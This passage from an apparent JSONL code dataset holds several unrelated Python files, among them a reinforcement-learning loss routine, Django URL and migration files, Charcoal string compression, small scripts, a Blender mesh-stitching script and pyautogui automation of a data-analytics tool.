cast(FQFBatchProtocol, result)\n\n def learn(self, batch: RolloutBatchProtocol, *args: Any, **kwargs: Any) -> dict[str, float]:\n if 
self._target and self._iter % self._freq == 0:\n self.sync_weight()\n weight = batch.pop(\"weight\", 1.0)\n out = self(batch)\n curr_dist_orig = out.logits\n taus, tau_hats = out.fractions.taus, out.fractions.tau_hats\n act = batch.act\n curr_dist = curr_dist_orig[np.arange(len(act)), act, :].unsqueeze(2)\n target_dist = batch.returns.unsqueeze(1)\n # calculate each element's difference between curr_dist and target_dist\n dist_diff = F.smooth_l1_loss(target_dist, curr_dist, reduction=\"none\")\n huber_loss = (\n (\n dist_diff\n * (tau_hats.unsqueeze(2) - (target_dist - curr_dist).detach().le(0.0).float()).abs()\n )\n .sum(-1)\n .mean(1)\n )\n quantile_loss = (huber_loss * weight).mean()\n # ref: https://github.com/ku2482/fqf-iqn-qrdqn.pytorch/\n # blob/master/fqf_iqn_qrdqn/agent/qrdqn_agent.py L130\n batch.weight = dist_diff.detach().abs().sum(-1).mean(1) # prio-buffer\n # calculate fraction loss\n with torch.no_grad():\n sa_quantile_hats = curr_dist_orig[np.arange(len(act)), act, :]\n sa_quantiles = out.quantiles_tau[np.arange(len(act)), act, :]\n # ref: https://github.com/ku2482/fqf-iqn-qrdqn.pytorch/\n # blob/master/fqf_iqn_qrdqn/agent/fqf_agent.py L169\n values_1 = sa_quantiles - sa_quantile_hats[:, :-1]\n signs_1 = sa_quantiles > torch.cat(\n [sa_quantile_hats[:, :1], sa_quantiles[:, :-1]],\n dim=1,\n )\n\n values_2 = sa_quantiles - sa_quantile_hats[:, 1:]\n signs_2 = sa_quantiles < torch.cat(\n [sa_quantiles[:, 1:], sa_quantile_hats[:, -1:]],\n dim=1,\n )\n\n gradient_of_taus = torch.where(signs_1, values_1, -values_1) + torch.where(\n signs_2,\n values_2,\n -values_2,\n )\n fraction_loss = (gradient_of_taus * taus[:, 1:-1]).sum(1).mean()\n # calculate entropy loss\n entropy_loss = out.fractions.entropies.mean()\n fraction_entropy_loss = fraction_loss - self._ent_coef * entropy_loss\n self._fraction_optim.zero_grad()\n fraction_entropy_loss.backward(retain_graph=True)\n self._fraction_optim.step()\n self.optim.zero_grad()\n quantile_loss.backward()\n self.optim.step()\n self._iter += 1\n return {\n \"loss\": quantile_loss.item() + fraction_entropy_loss.item(),\n \"loss/quantile\": quantile_loss.item(),\n \"loss/fraction\": fraction_loss.item(),\n \"loss/entropy\": entropy_loss.item(),\n }\n","sub_path":"tianshou/policy/modelfree/fqf.py","file_name":"fqf.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203533076","text":"from django.conf.urls import patterns, url\n\nfrom manager import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index2, name='index2'),\n url(r'^view/$', views.view, name='view'),\n # url(r'^add/$', views.add, name='add'),\n url(r'^contact_us/$', views.contact_us, name='contact_us'),\n # url(r'^handle_add/$', views.handle_add, name='handle_add'),\n url(r'^view/edit/(?P\\d+)/$', views.edit, name='edit'),\n url(r'^view/delete/(?P\\d+)/$', views.delete, name='delete'),\n url(r'api/post_data', views.post_config),\n url(r'^exp/$', views.exp, name='exp'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^adminpage/$', views.adminpage, name='adminpage'),\n url(r'^handle_edit/$', views.handle_edit, name='handle_edit'),\n url(r'^add_offline_stock/$', views.add_offline_stock, name='add_offline_stock'),\n url(r'^view_offline_stock/$', views.view_offline_stock, name='view_offline_stock'),\n url(r'^handle_offline_add/$', views.handle_offline_add, name='handle_offline_add'),\n url(r'^view_offline_stock/edit/(?P\\d+)$', views.editoffline, name='editoffline'),\n 
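# the routes below cover the offline-stock workflow (delete, edit submission, exports, search)\n 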
url(r'^view_offline_stock/delete/(?P\\d+)$', views.deleteoffline, name='deleteoffline'),\n url(r'^handle_offline_edit/$', views.handle_offline_edit, name='handle_offline_edit'),\n url(r'^expoffline/$', views.expoffline, name='expoffline'),\n url(r'^expfull/$', views.expfull, name='expfull'),\n url(r'^search/$', views.search, name='search'),\n url(r'^searchoffline/$', views.searchoffline, name='searchoffline'),\n) \n","sub_path":"invent_manage/manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"631804211","text":"def Test():\n s=input()\n s=s.replace(\"s\",\" \")\n s=s.replace(\"t\",\" \")\n s=s.replace(\"\\\"\",\" \")\n s=s.replace(\"=\",\" \")\n s=s.replace(\" \",\"\")\n q=s.split(\",\")\n word1=q[0]\n word2=q[1]\n maps1=[]\n maps2=[]\n if(len(word1)!=len(word2)):\n print(\"false\")\n else:\n for i in range(0,128):\n maps1.append(0)\n maps2.append(0)\n for i in range(0,len(word1)):\n maps1[ord(word1[i])]=maps1[ord(word1[i])]+1\n maps2[ord(word2[i])]=maps2[ord(word2[i])]+1\n if(check(maps1,maps2)):\n print(\"true\")\n else:\n print(\"false\")\n\ndef check(a,b):\n for i in range(0,len(a)):\n if(a[i]!=b[i]):\n return False\n return True\n\nif __name__ == \"__main__\":\n Test()","sub_path":"Code/CodeRecords/2445/60595/238455.py","file_name":"238455.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467232279","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Effort',\n fields=[\n ('id', models.BigIntegerField(serialize=False, primary_key=True)),\n ('name', models.TextField()),\n ('elapsed_time', models.IntegerField()),\n ('moving_time', models.IntegerField()),\n ('start_date', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('user', models.OneToOneField(related_name='profile', primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),\n ('pic', models.URLField()),\n ],\n ),\n migrations.CreateModel(\n name='Segment',\n fields=[\n ('id', models.IntegerField(serialize=False, primary_key=True)),\n ('name', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='StarredSegment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('segment', models.ForeignKey(related_name='+', to='core.Segment')),\n ('user', models.ForeignKey(related_name='starred_segments', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='effort',\n name='segment',\n field=models.ForeignKey(related_name='efforts', to='core.Segment'),\n ),\n migrations.AddField(\n model_name='effort',\n name='user',\n field=models.ForeignKey(related_name='efforts', to=settings.AUTH_USER_MODEL),\n ),\n ]\n","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"377673160","text":"from codepage import OrdinalLookup, Codepage\nfrom string import ascii_lowercase, ascii_uppercase, 
digits\nimport re\n\nsymbols = \".!\\\"#$%&'()*+,-/:;<=>?@[\\]^_`{|}~\"\nwhitespace = \"\\n \"\ndefault_order = \"wslnu\"\ncharset_fragment_lookup = {\n \"w\": whitespace, \"s\": symbols, \"l\": ascii_lowercase, \"n\": digits,\n \"u\": ascii_uppercase\n}\ndefault_charset = (\n whitespace + symbols + ascii_lowercase + digits + ascii_uppercase\n)\nCodepage.remove(\"”\")\ngap = OrdinalLookup[\"”\"]\n\n\ndef Compressed(string):\n \"\"\"\n Compressed(string) -> str\n Returns the shortest Charcoal compressed literal of the given string.\n\n \"\"\"\n if not string:\n return \"””\"\n if not all(\n character == \"¶\" or character >= \" \" and character <= \"~\"\n for character in string\n ):\n return string\n original_string, string = string, re.sub(\"¶\", \"\\n\", string)\n compressed_permuted = CompressPermutations(string)\n compressed = CompressString(string)\n string_length = len(original_string) - 2\n if (\n string_length < len(compressed_permuted) and\n string_length < len(compressed)\n ):\n return original_string\n if len(compressed_permuted) < len(compressed):\n return \"”\" + compressed_permuted + \"”\"\n else:\n return \"“\" + compressed + \"”\"\n\n\ndef CompressPermutations(string):\n \"\"\"\n CompressPermutations(string) -> str\n Returns without delimiters the given string compressed \\\nusing a permuted codepage, without delimiters.\n\n \"\"\"\n numeric = lowercase = uppercase = whitespace = symbol = 0\n for character in string:\n if character >= \"0\" and character <= \"9\":\n numeric -= .1\n elif character >= \"a\" and character <= \"z\":\n lowercase -= 0.03846\n elif character >= \"A\" and character <= \"Z\":\n uppercase -= 0.03846\n elif character == \"\\n\" or character == \" \":\n whitespace -= .5\n else:\n symbol -= .03125\n result = \"\".join(map(lambda t: t[1], sorted([\n (whitespace, \"w\"), (symbol, \"s\"), (lowercase, \"l\"), (numeric, \"n\"),\n (uppercase, \"u\")\n ])))\n index, base = 0, 5\n charset = \"\".join(\n charset_fragment_lookup[character] for character in result\n )\n for character in default_order[:-1]:\n index = index * base + result.index(character)\n result = result.replace(character, \"\", 1)\n base -= 1\n return Codepage[index] + Compress([\n charset.index(character) for character in string\n ])\n\n\ndef CompressString(string):\n \"\"\"\n CompressString(string) -> str\n Returns without delimiters the given string compressed.\n\n \"\"\"\n return Compress([\n default_charset.index(character) for character in string\n ])\n\n\ndef Compress(ordinals):\n \"\"\"\n Compress(ordinals) -> str\n Returns without delimiters the given string compressed.\n\n \"\"\"\n base, result, number = max(ordinals) + 1, \"\", 1\n if base == 1:\n number = len(ordinals)\n else:\n for ordinal in ordinals:\n number = number * base + ordinal\n while number:\n result = Codepage[number % 255] + result\n number //= 255\n return Codepage[base - 1] + result\n\n\ndef Decompressed(string):\n \"\"\"\n Decompressed(string) -> str\n Returns the decompressed form of the given Charcoal string.\n\n \"\"\"\n if string == \"””\":\n return \"\"\n if string[-1] != \"”\":\n return string\n if string[0] == \"”\":\n return DecompressPermutations(string[1:-1])\n elif string[0] == \"“\":\n return DecompressString(string[1:-1])\n\n\ndef DecompressPermutations(string):\n \"\"\"\n DecompressPermutations(string) -> str\n Returns the original form of the given string compressed \\\nusing a permuted codepage, passed without delimiters.\n\n \"\"\"\n index = OrdinalLookup.get(string[0], ord(string[0]))\n if index > 
gap:\n index -= 1\n base = 2\n letters = [\"u\"]\n while index:\n letters.insert(index % base, default_order[5 - base])\n index //= base\n base += 1\n while base <= 5:\n letters.insert(0, default_order[5 - base])\n base += 1\n charset = \"\".join(\n charset_fragment_lookup[character] for character in letters\n )\n return \"\".join([\n charset[ordinal] for ordinal in Decompress(string[1:])\n ])\n\n\ndef DecompressString(string):\n \"\"\"\n DecompressString(string) -> str\n Returns the original form of the given string compressed, \\\npassed without delimiters.\n\n \"\"\"\n return \"\".join([\n default_charset[ordinal] for ordinal in Decompress(string)\n ])\n\n\ndef Decompress(string):\n \"\"\"\n Decompress(string) -> list\n Returns the ordinals in the original form of the given string compressed.\n\n \"\"\"\n number, result = 0, []\n base = OrdinalLookup.get(string[0], ord(string[0])) + 1\n if base > gap:\n base -= 1\n for character in string[1:]:\n ordinal = OrdinalLookup.get(character, ord(character))\n number = (number * 255) + ordinal - (ordinal > gap)\n if base == 1:\n return [ord(\"\\n\")] * number\n while number > 1:\n remainder = number % base\n result = [remainder] + result\n number //= base\n return result\n","sub_path":"compression.py","file_name":"compression.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"269246440","text":"import random\r\nimport sys\r\n\r\nl = 3\r\ntry:\r\n length = sys.argv[1]\r\n l = int(length)\r\nexcept ValueError:\r\n print(\"{} isn't a number!\".format(length))\r\nexcept IndexError:\r\n print(\"No arguments were provided\")\r\n\r\nmaxrounds = 2 ** l + l \r\n\r\nnumber = random.randint(0, 10 ** l)\r\nprint(\"Let's play the mimsmind1 game. You have {} guesses\".format(maxrounds))\r\n\r\nguess = input(\"Guess a {}-digit number: \".format(l))\r\n\r\nwhile maxrounds >= 0:\r\n guess = int(guess)\r\n if guess > number:\r\n guess = input(\"Try again. Guess a lower number: \")\r\n maxrounds -=1\r\n elif guess < number:\r\n guess = input(\"Try again. Guess a higher number: \")\r\n maxrounds -=1\r\n elif guess == number:\r\n maxrounds -=1\r\n print(\"Congratulations. You guessed the correct number in {} tries.\".format(maxrounds))\r\n break\r\n else:\r\n print(\"Seems like it is not a number. Try next time. 
Bye!\")\r\n break\r\nprint(\"Sorry, you are out of tries\")\r\n","sub_path":"mimsmind1.py","file_name":"mimsmind1.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"140899432","text":"from __future__ import print_function\nimport json\n\nimport requests\n\nmovie_json = \"\"\"\n{\n\"Title\":\"Circut\",\n\"Year\":\"2000\",\n\"Runtime\":\"130 min\",\n\"Country\":\"USA\"\n}\n\"\"\"\n\nmovie_data = json.loads(movie_json)\nprint(movie_data)\nprint(\"Movie title from static json:\")\nprint(movie_data['Title'])\nprint()\n\nurl = 'http://www.omdbapi.com/?y=&plot=short&r=json&t=true&s=silicon'\nresp = requests.get(url)\nsearch_results = resp.json()['Search']\nprint(search_results)\n\nprint(\"Movies with circuit title:\")\nfor m in search_results:\n print(\" * \" + m['Title'])\n","sub_path":"h_json.py","file_name":"h_json.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"520958598","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 6 15:33:54 2021\n\n@author: kariln\n\nSPATIAL FEATURES\n\"\"\"\nfrom scipy.spatial import distance\nfrom datetime import datetime\nfrom functions import column_check\n\ndef euclidean(data):\n now = datetime.now()\n print('Euclidean: ' + str(now))\n column_check(data,['Q_x','Q_y','Q_z','x','y','z'])\n data['euclidean_d_Q'] = None\n for index, row in data.iterrows():\n a = (row['Q_x'], row['Q_y'], row['Q_z'])\n b = (row['x'], row['y'], row['z'])\n dst = distance.euclidean(a, b)\n data['euclidean_d_Q'].iloc[index] = dst\n data.to_csv('disp_Pint.csv',encoding='utf-8', index=False) \n return data\n\ndef manhattan(data):\n now = datetime.now()\n print('Manhattan: ' + str(now))\n column_check(data,['Q_x','Q_y','Q_z','x','y','z'])\n data['manh_d_Q'] = None\n for index, row in data.iterrows():\n a = (row['Q_x'], row['Q_y'], row['Q_z'])\n b = (row['x'], row['y'], row['z'])\n dst = distance.cityblock(a, b)\n data['manh_d_Q'].iloc[index] = dst\n data.to_csv('disp_Pint.csv',encoding='utf-8', index=False) \n return data\n\ndef laser_distance(data):\n now = datetime.now()\n print('Laser distance: ' + str(now))\n column_check(data,['Q_x','Q_y','Q_z','x','y','z','road_width','layer_thickness'])\n data['d_Q_x'] = None\n data['d_Q_y'] = None\n data['d_Q_z'] = None\n for index, row in data.iterrows():\n data['d_Q_x'].iloc[index] = abs(row['Q_x']-row['x'])/row['road_width']\n data['d_Q_y'].iloc[index] = abs(row['Q_y']-row['y'])/row['road_width']\n data['d_Q_z'].iloc[index] = abs(row['Q_z']-row['z'])/row['layer_thickness']\n data.to_csv('disp_d_Q.csv',encoding='utf-8', index=False) \n return data\n\ndef euclid_grad(data):\n now = datetime.now()\n print('Euclidean gradient: ' + str(now))\n column_check(data,['euclidean_d_Q'])\n data['euclid_grad'] = None\n num_i = data['i'].nunique()\n i = data['i'].unique()\n for j in range(0,num_i):\n data_i = data[data['i'] == i[j]] \n indexes = data_i.index\n num = 0\n for index,row in data_i.iterrows():\n if num == 0: \n data['euclid_grad'].iloc[index] = 0\n else:\n data['euclid_grad'].iloc[index] = data['euclidean_d_Q'].iloc[indexes[num]]-data['euclidean_d_Q'].iloc[indexes[num-1]]\n num += 1\n data.to_csv('disp_grad.csv',encoding='utf-8', index=False) \n return data\n\ndef laser_dir(data):\n now = datetime.now()\n print('Laser direction: ' + str(now))\n column_check(data,['euclid_grad'])\n data['laser_dir'] = None\n for index,row in data.iterrows():\n if 
row['euclid_grad'] > 0: \n data['laser_dir'].iloc[index] = 1\n else:\n data['laser_dir'].iloc[index] = 0\n data.to_csv('disp_dir.csv',encoding='utf-8', index=False) \n return data\n\ndef layerNum(data, nr_layers: int):\n now = datetime.now()\n print('Layer number: ' + str(now))\n column_check(data,['z','layer_thickness','basedepth'])\n data['layerNum'] = None\n layer_thickness = data['layer_thickness'].iloc[0]\n base_height = data['basedepth'].iloc[0]\n \n #Finding layer numbers and heights\n layers = []\n heights = []\n height = base_height\n for i in range(1,nr_layers + 1): \n layers.append(i)\n height = round(height+layer_thickness,4)\n heights.append(height)\n #Inserting layer numbers\n for index,row in data.iterrows():\n if round(row['z'],4) == base_height:\n data['layerNum'].iloc[index] = 1\n else:\n layer = 0\n for height in heights:\n if round(row['z'],4) == height:\n layer += 1\n data['layerNum'].iloc[index] = layer\n break\n data.to_csv('disp_layer.csv',encoding='utf-8', index=False) \n return data\n\ndef spatial(data, nr_layers: int):\n now = datetime.now()\n print('Spatial: ' + str(now))\n data = layerNum(data, nr_layers)\n data = euclidean(data)\n data = manhattan(data)\n data = euclid_grad(data)\n data = laser_dir(data)\n data = laser_distance(data)\n return data\n","sub_path":"Preprocessing/feature_extraction/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457700821","text":"import bpy\nimport bmesh\nimport pickle\n\ndef wrt_base(mesh_index):\n # Get the active mesh\n obj = bpy.context.editable_objects[mesh_index]\n me = obj.data\n\n bpy.ops.object.editmode_toggle()\n # Get a BMesh representation\n bm = bmesh.from_edit_mesh(me)\n\n bm.faces.active = None\n\n bm.verts.ensure_lookup_table()\n\n maxx = minx = bm.verts[0].co.x \n maxy = miny = bm.verts[0].co.y\n maxz = minz = bm.verts[0].co.z\n\n # Modify the BMesh, can do anything here...\n for v in bm.verts:\n if(v.co.x > maxx):\n maxx = v.co.x\n elif(v.co.x < minx):\n minx = v.co.x\n if(v.co.y > maxy):\n maxy = v.co.y\n elif(v.co.y < miny):\n miny = v.co.y\n if(v.co.z > maxz):\n maxz = v.co.z\n elif(v.co.z < minz):\n minz = v.co.z\n \n res = (maxx, minx, maxy, miny, maxz, minz)\n rx = maxx-minx\n ry = maxy-miny\n rz = maxz-minz\n \n with open('/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/base_stats', 'rb') as fp:\n base = pickle.load(fp)\n \n bmaxx, bminx, bmaxy, bminy, bmaxz, bminz = base\n brx = bmaxx-bminx\n bry = bmaxy-bminy\n brz = bmaxz-bminz\n\n #print(rx, brx)\n #print(ry, bry)\n #print(rz, brz)\n\n sx = rx/brx\n sy = ry/bry\n sz = (sx+sy)/2\n\n print(sx, sy, sz)\n #print(minz, bminz)\n scale = (sx, sy, sz)\n zdisp = max(bminz-minz, 0) + 60 * (sz-1)\n bpy.ops.object.editmode_toggle()\n \n return scale, zdisp\n\n\nmesh = 'face1-texture'\n\nbpy.ops.import_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/backHead2.ply')\nbpy.ops.import_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/'+mesh+'.ply')\n\nindex = -1\nfor i, obj in enumerate(bpy.context.editable_objects):\n if(obj.name==mesh):\n index = i\n break\n\nscale, zdisp = wrt_base(index)\n\nprint(zdisp)\n\nbpy.data.objects['backHead2'].scale = scale\nbpy.data.objects['backHead2'].location[2] = -zdisp\n\nbpy.ops.object.join()\nobj = bpy.context.editable_objects[0]\nme = obj.data\n\nbpy.ops.object.editmode_toggle()\n# Get a BMesh representation\nbm = 
bmesh.from_edit_mesh(me)\n\nbm.faces.active = None\n\nwith open('/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/edge_loops', 'rb') as f:\n toBeSelected = pickle.load(f)\n \nwith open('/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/border_verts', 'rb') as f:\n toBeSelectedVerts = pickle.load(f)\n\nbm.verts.ensure_lookup_table()\nbm.edges.ensure_lookup_table()\n\nlst = []\n# Modify the BMesh, can do anything here...\nfor v in bm.verts:\n v.select = False\n \nfor e in bm.edges:\n e.select = False\n \nfor index in toBeSelectedVerts:\n bm.verts[index].select = True\n \nfor index in toBeSelected:\n bm.edges[index].select = True\n\n# Show the updates in the viewport\n# and recalculate n-gon tessellation.\nbmesh.update_edit_mesh(me, True)\n\nbpy.ops.mesh.bridge_edge_loops()\nbpy.ops.mesh.remove_doubles()\nbpy.ops.object.mode_set(mode=\"OBJECT\")\nbpy.ops.object.shade_smooth()\n\nbpy.ops.export_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/'+mesh+'_full.ply', use_normals=False, use_uv_coords=False)\n\nglass_folder = 'sun_glasses'\n\nbpy.ops.import_scene.gltf(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/align_gltf/all gltf/'+glass_folder+'_align/scene.gltf')\n#bpy.ops.import_mesh.ply(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/face_stitch/'+mesh+'_full.ply')\n\nfor i, obj in enumerate(bpy.context.editable_objects):\n if(obj.name.find('roshan')!=-1):\n obj.scale = scale\n\nbpy.ops.export_scene.gltf(filepath='/Users/Roshan/Documents/Academics/BTP/Blenders/align_gltf/all gltf/'+glass_folder+'_total/scene.gltf')\n\n","sub_path":"face_stitch/add_glasses.py","file_name":"add_glasses.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"54265211","text":"from django.core.management.base import BaseCommand, CommandError\nfrom permits.models import Applicant, Permit, Zoning\nimport os\nimport csv\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n counter = 1\n filepath = os.path.join( os.path.dirname ( __file__ ), '..', '..', 'data' )\n zoning_csv = open(os.path.join(filepath, 'zoning.csv'))\n zonings = csv.DictReader(zoning_csv)\n\n for zoning in zonings:\n try:\n permit_nr = zoning['apno']\n permit = Permit.objects.get(permit_nr = permit_nr)\n Zoning.objects.create(permit_nr=permit, **zoning)\n print(\"saving record %s\") % counter\n counter += 1\n except Permit.DoesNotExist:\n print(\"Permit.DoesNotExist\")\n","sub_path":"permits/management/commands/import_zoning.py","file_name":"import_zoning.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"283568486","text":"from ADB import AutoDatabank, t180, t365, somedays, namesstt\nfrom ADB import swtime, timedelta, two_check_time, checktime\nfrom datetime import timedelta\nfrom ADB import set_pause,click2,doubleclick_after_exist,deletelogic,yanzheng_logic\nimport threading,time\nimport pickle, xlrd\nfrom datetime import datetime\nimport pyautogui,pyperclip\nimport pandas as pd\nfrom xlutils.copy import copy\nfrom ADB.positiondf import *\n\ndef get_pplnumber_12(islaoke,ts,te,ts2,te2,nori,xn,savepath):\n\toutcount = 0\n\tn = nori\n\twhile n <= xn:\n\t\ttry:\n\t\t\tRB.cp()\n\t\t\tif n < xn:\n\t\t\t\tRB.zszw([n,n],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([n,999],ts,te,1)\n\n\t\t\tRB.dp(5,ts2,te2,3)\n\t\t\tif 
islaoke:\n\t\t\t\tRB.zszw([1,999],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([1,999],ts,te,3)\n\n\t\t\t# verify the logic count\n\t\t\tyanzheng_logic(3)\n\n\t\t\tclick2((1340,1018))\n\t\t\tpyperclip.copy('')\n\t\t\tcount = 0\n\t\t\twhile pyperclip.paste().strip() == '':\n\t\t\t\tpyautogui.doubleClick((1220,1020))\n\t\t\t\tpyautogui.hotkey('ctrl', 'c')\n\t\t\t\tcount += 1\n\t\t\t\ttime.sleep(1)\n\t\t\t\tif count > 70:\n\t\t\t\t\traise AssertionError\n\t\t\ttry:\n\t\t\t\tpplnumber = int(''.join(pyperclip.paste().split(',')))\n\t\t\texcept:\n\t\t\t\traise AssertionError\n\t\t\t'''\n\t\t\tfor i in range(5):\n\t\t\t\tdeletelogic()\n\t\t\t\ttime.sleep(1.2)\n\t\t\t#info = pd.DataFrame({'date':ppldate,'number':pplnumber},index=None)\n\t\t\t#info.to_excel(r'E:\\git\\adbscript\\adirenqun\\Arenqun.xlsx',index=None,header=True)\n\t\t\t'''\n\t\t\tworkbook = xlrd.open_workbook(savepath, formatting_info=True)\n\t\t\tsheet = workbook.sheet_by_index(0)\n\t\t\trowNum = sheet.nrows\n\t\t\tcolNum = sheet.ncols\n\t\t\tnewbook = copy(workbook)\n\t\t\tnewrow = newbook.get_sheet(0)\n\t\t\t# append a new row at the end\n\t\t\tnewrow.write(rowNum, 1, pplnumber)\n\t\t\tnewrow.write(rowNum, 0, n)\n\t\t\t# save, overwriting the file\n\t\t\tnewbook.save(savepath)\n\n\t\t\tn += 1\n\n\t\texcept (AssertionError,ValueError):\n\t\t\toutcount += 1\n\t\t\tif outcount < 5:\n\t\t\t\tget_pplnumber_12(islaoke,ts,te,ts2,te2,n,xn,savepath)\n\t\t\telse:\n\t\t\t\tworkbook = xlrd.open_workbook(savepath, formatting_info=True)\n\t\t\t\tsheet = workbook.sheet_by_index(0)\n\t\t\t\trowNum = sheet.nrows\n\t\t\t\tcolNum = sheet.ncols\n\t\t\t\tnewbook = copy(workbook)\n\t\t\t\tnewrow = newbook.get_sheet(0)\n\t\t\t\t# append a new row at the end\n\t\t\t\tnewrow.write(rowNum, 1, '超时')\n\t\t\t\tnewrow.write(rowNum, 0, n)\n\t\t\t\t# save, overwriting the file\n\t\t\t\tnewbook.save(savepath)\n\n\t\t\t\tn += 1\n\t\t\t\tget_pplnumber_12(islaoke,ts,te,ts2,te2,n,xn,savepath)\n\ndef get_pplnumber_34(islaoke,ts,te,ts2,te2,nori,xn):\n\toutcount = 0\n\tn = nori\n\twhile n <= xn:\n\t\ttry:\n\t\t\tRB.cp()\n\t\t\tRB.zdy('【辅】618A',1)\n\n\t\t\tif n < xn:\n\t\t\t\tRB.zszw([n,n],ts,te,2)\n\t\t\telse:\n\t\t\t\tRB.zszw([n,999],ts,te,2)\n\n\t\t\tRB.dp(5,ts,te,1)\n\n\t\t\tRB.dp(5,ts2,te2,1)\n\t\t\tif islaoke:\n\t\t\t\tRB.zszw([1,999],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([1,999],ts,te,3)\n\n\t\t\t# verify the logic count\n\t\t\tyanzheng_logic(5)\n\t\t\tif islaoke:\n\t\t\t\tRB.sp('3老客交曝光%s次' % n)\n\t\t\telse:\n\t\t\t\tRB.sp('4新客交曝光%s次' % n)\n\n\n\t\t\tn += 1\n\n\t\texcept (AssertionError,ValueError):\n\t\t\toutcount += 1\n\t\t\tif outcount < 5:\n\t\t\t\tget_pplnumber_34(islaoke,ts,te,ts2,te2,n,xn)\n\t\t\telse:\n\t\t\t\tn += 1\n\t\t\t\tget_pplnumber_34(islaoke,ts,te,ts2,te2,n,xn)\n\ndef get_pplnumber_12new(islaoke,ts,te,ts2,te2,nori,xn):\n\toutcount = 0\n\tn = nori\n\twhile n <= xn:\n\t\ttry:\n\t\t\tRB.cp()\n\t\t\tif n < xn:\n\t\t\t\tRB.zszw([n,n],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([n,999],ts,te,1)\n\n\t\t\tRB.dp(5,ts2,te2,3)\n\n\t\t\tif islaoke:\n\t\t\t\tRB.zszw([1,999],ts,te,1)\n\t\t\telse:\n\t\t\t\tRB.zszw([1,999],ts,te,3)\n\n\t\t\t# verify the logic count\n\t\t\tyanzheng_logic(3)\n\t\t\tif islaoke:\n\t\t\t\tRB.sp('1老客交曝光%s次' % n)\n\t\t\telse:\n\t\t\t\tRB.sp('2新客交曝光%s次' % n)\n\n\n\t\t\tn += 1\n\n\t\texcept (AssertionError,ValueError):\n\t\t\toutcount += 1\n\t\t\tif outcount < 5:\n\t\t\t\tget_pplnumber_12new(islaoke,ts,te,ts2,te2,n,xn)\n\t\t\telse:\n\t\t\t\tn += 1\n\t\t\t\tget_pplnumber_12new(islaoke,ts,te,ts2,te2,n,xn)\n\n\n\n\nRB = AutoDatabank(coordfile = '2019-06-21', account = 'ATzh', purchase_Behaviour='dp')\n\nif __name__ == '__main__':\n\tset_pause(0.2, 0.2)\n\n\tts = '2019-05-29'\n\tte = 
'2019-06-18'\n\tts2 = '2018-07-12'\n\tte2 = '2019-05-28'\n\n\t'''\n\tsavepath = r'E:\\git\\adbscript\\rb\\rb1.xls'\n\tget_pplnumber_12(True,ts,te,ts2,te2,1,15,savepath)\n\tsavepath = r'E:\\git\\adbscript\\rb\\rb2.xls'\n\tget_pplnumber_12(False,ts,te,ts2,te2,1,15,savepath)\n\t'''\n\tget_pplnumber_12new(True,ts,te,ts2,te2,1,15)\n\tget_pplnumber_12new(False,ts,te,ts2,te2,1,15)\n\tget_pplnumber_34(True,ts,te,ts2,te2,1,15)\n\tget_pplnumber_34(False,ts,te,ts2,te2,1,15)\n\n","sub_path":"zzpc.py","file_name":"zzpc.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"114701282","text":"import copy\nimport math\nimport os\nimport random\nfrom typing import Dict, List\n\nfrom src.Chromosome import Chromosome\nfrom src.NetworkModel import NetworkModel\nfrom src.NetworkVisualizer import 